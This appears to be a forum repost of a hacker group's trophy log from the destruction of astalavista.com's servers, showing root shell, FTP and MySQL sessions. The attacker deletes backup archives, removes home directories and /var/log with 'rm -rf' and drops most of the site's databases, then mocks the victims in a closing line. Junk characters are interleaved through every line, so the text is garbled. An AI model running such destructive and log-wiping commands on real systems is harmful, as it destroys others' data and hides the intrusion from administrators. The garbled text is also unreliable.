227 Entering Passive Mode (212,254,194,163,2,189)* ]- g9 S3 _3 N3 D- }6 U
150 Opening BINARY mode data connection for ‘file list’.* r t5 ]* Q8 ?! L+ g+ p. f( X
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar/ B8 y9 o. \1 v
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
* B8 Y. }0 T" X e3 N-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2 p9 w: C0 C( S6 g; d. J
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar% f* o8 W7 c" c& G" g: U& Q$ s! Q6 I
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar9 V, y: z3 J$ t8 \4 f0 {
[snip] D5 g* U) H8 T
226 Transfer complete.0 ]( t" N# Y6 s/ o
ftp> mdelete *
7 w% `, I8 Q0 x4 Yftp> ls -la
4 I1 w- z- x3 U227 Entering Passive Mode (212,254,194,163,2,193)0 B9 F. @% \+ m6 E
150 Opening BINARY mode data connection for ‘file list’. m4 n4 z6 x( C" {
226 Transfer complete.
( O3 }: }: |8 O* c/ Eftp>
) l$ _1 U) s; W
4 H, }+ M- G4 }1 d/ I& ?sh-3.2# cd /home$ d- X% G+ i. P8 w5 |
sh-3.2# ls -la7 L. I: V, u* |9 \' u# Y W
total 120
$ G' l8 a% s1 h) T9 adrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
1 B4 k( [ G$ h8 O+ ?, gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' \7 e U4 R3 H0 q) Y" idrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
% P7 K& E) e: ^3 e* b-rw——- 1 root root 8192 Jun 4 03:03 aquota.group5 }) g5 X' M" g
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
Y8 e% R' T0 U8 c- t( e4 Ldrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
7 z) _* E: Q1 m$ e1 t8 edrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
/ `* `0 X, o: C6 c& N9 n9 @drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161- l- a% ~ t0 K% @+ ?. r$ E
drwx–x–x 10 com com 4096 Apr 28 12:40 com
@: N5 I1 ~1 \# m' ddrwxr-xr-x 2 root root 4096 May 17 2007 ftp
2 N" O5 S6 t+ J$ H) ?: V Ddrwx—— 3 jon jon 4096 Sep 21 2007 jon/ x3 O8 S( L2 c0 ~: |& K( \2 {3 z
drwx—— 2 root root 16384 Sep 11 2007 lost+found
1 M, O/ b' _) u. Vdrwxr-xr-x 2 root root 4096 Sep 14 2007 my9 Q+ s, V$ u3 K V5 c! J s# m
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
- x6 _9 M/ b7 X# [0 ~2 ddrwx—— 2 jon jon 4096 Sep 15 2007 test- ?2 G' h( v! e- j/ T- ?# y
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp0 n& u: h* b# _ v( b9 m- Y* ~
6 h6 n0 Z& @+ o3 u5 Vsh-3.2# rm -rf backup/
, N* f/ `! S3 s9 Ysh-3.2# rm -rf backup.14161/
1 D# O) r! J/ O% A @; R3 m* Fsh-3.2# rm -rf ftp/1 _( L8 U# A6 M5 E9 M
sh-3.2# rm -rf jon/9 [# Y0 D' i7 T1 l$ v* K
sh-3.2# rm -rf my/6 X: d2 c/ ~/ Y; O5 o x* A
sh-3.2# rm -rf mysqldata/
, a* D( q0 ^1 G1 vsh-3.2# rm -rf test/, x7 a6 I8 ]+ ]5 `) j
sh-3.2# rm -rf tmp/9 ?+ X7 i. j" d9 M; p; Q/ @: `7 b
sh-3.2# cd ~% n' i/ d' p$ v2 q
sh-3.2# rm -rf *
% k& H5 J! I* Zsh-3.2# rm -rf /var/log/
& l/ ^. V P6 o9 R3 p1 _5 Yrm: cannot remove directory `/var/log//proftpd’: Directory not empty
6 h( i) t) t0 s! d0 @ ?sh-3.2# rm -rf /home/** Z ^9 R& B: z8 N( Q; f& d8 J
sh-3.2# mysql; a) V: Q+ z8 k* _: B- |
Welcome to the MySQL monitor. Commands end with ; or \g.
1 j4 u) V, c" p1 jYour MySQL connection id is 4071564 _3 y7 _( O9 \ }+ h) p6 E
Server version: 5.0.45-community-log MySQL Community Edition (GPL)9 g+ U, Z8 ]# F. W4 e/ m
9 u6 |- q6 R' h( U3 N+ V( _Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.- ?) U) G- {( h5 y. l6 C% l
* O8 c; B0 \) B; l' U
mysql> show databases;% O W& g( V% d, Y# m
+———————–++ w; C# K r% s# V/ N) W
| Database |
/ q: a7 x/ y! R8 T: a4 ^7 D4 e+———————–+( I! h4 m e; G/ [# U
| information_schema |
9 u7 t8 b5 {) p- ~ T| astanet_ads |
+ F. Y$ O4 Z3 U| astanet_mailing_lists |( u: T5 |7 T. t: ^) F$ H
| astanet_mediawiki |/ m3 Q9 X ]( h9 l
| astanet_membersystem |
6 ~4 ?8 V3 e- g5 P2 ?( v- v| com_contrexx |
. v* M9 i0 Q! ^. i, x| com_contrexx2 |! f: L) I. P7 Q, Z6 }
| com_contrexx2_live |. C& H! F/ A$ M2 S, @
| da_roundcube |
9 h# _) q2 i+ C| dolphin |+ ]- Y" q7 k n) j/ ~6 \1 p- V+ F9 B( }
| ideapool |
1 i! f, @! D. I| mysql |
/ W9 N2 k f" ?5 V* D0 F9 _* Q| test |
6 q" b* q0 A2 F) {9 v| yourmaster |
7 y' f- @) B5 C/ u+———————–+
9 E x: i7 S4 |/ h, j) f14 rows in set (0.03 sec)
) m/ I( W1 I& ~: Z' z
# W% i% O' E; [8 omysql> drop database astanet_membersystem;' B S8 t1 m4 ?( p. h
droQuery OK, 46 rows affected (0.81 sec)
}3 r0 o# U" T0 n" E$ ^
1 w# ]& M- B) u* a8 p( gmysql> drop database com_contrexx;, `7 B. J5 d! w! Z; C, r/ P* S
Query OK, 211 rows affected (2.72 sec)2 _ H3 u0 c" k+ X9 h& `
! C4 h+ v! p; h% A/ nmysql> drop database com_contrexx2;
. w0 ~9 h( F! R1 J- t- G- j+ D ]Query OK, 237 rows affected (2.23 sec)
+ y7 N8 I f) {! M0 o
; G$ k+ Q) Q. G+ U+ n4 emysql> drop database com_contrexx2_live;5 k* U* g$ o" u/ _, R4 ]
Query OK, 227 rows affected (7.63 sec). R8 h& P4 \1 V
4 p# ~; V6 R! y4 q! L' H
mysql> drop database ideapool;0 I$ u# P7 x& s) i
Query OK, 69 rows affected (0.19 sec)1 Z$ a& w- F _) V1 y" h
6 y6 F8 f J' K" a5 V, ^0 Qmysql> drop database yourmaster;/ l( H4 L+ p0 |
Query OK, 158 rows affected (0.55 sec)0 |3 N8 F! U) K
/ R% C' e- I0 q5 d+ L7 omysql> drop database astanet_ads;
& O9 K6 k0 m% j8 BQuery OK, 9 rows affected (0.11 sec)2 M3 r$ i& A& G1 E4 L6 P4 E
% J$ o- I2 m/ b6 ^2 Wmysql> drop database astanet_mailing_lists; I f; O* I; t; ~/ V
Query OK, 24 rows affected (1.47 sec)
# L5 b; S3 R# R% t$ O3 `' r7 h- ]- Y! G! P4 h5 P# b; E3 |; z
mysql> drop database astanet_mediawiki;3 |7 n4 z4 N9 \( X& x& ~5 H/ S
Query OK, 31 rows affected (0.51 sec)
8 ]8 z1 T9 j" u; C! y' C
# A1 `, F7 d" Vmysql> show databases;" O) f5 S8 Y p( S0 K
+——————–+/ s f& _" T7 ~* J5 c4 K l
| Database |
6 }* j( g; q4 S$ f5 u+——————–+
" [; R& \9 A3 P. V7 p1 V) T| information_schema | X; p& c9 D% k* Y
| da_roundcube |
8 {- H+ l' d1 L( m k| dolphin |5 F8 x& B* U' B
| mysql |
7 R5 m$ a9 K# w% |! q; c1 ~% T| test |# F( n3 w) ~& k( \9 W8 V
+——————–+; w! Z- B. b& T4 Q% M9 }
5 rows in set (0.00 sec)
+ e+ U4 n8 O% v, r! N
F7 |: x% k; dWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
! G" [ D( S- ~5 s! F/ Atheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
/ Q' I3 l, T5 ?2 u5 w L! t! bwrong to say this pack of morons *wont be back*.
; |) M* k$ Y6 l |
发表于 2012-11-6 21:07:34
收藏
支持
反对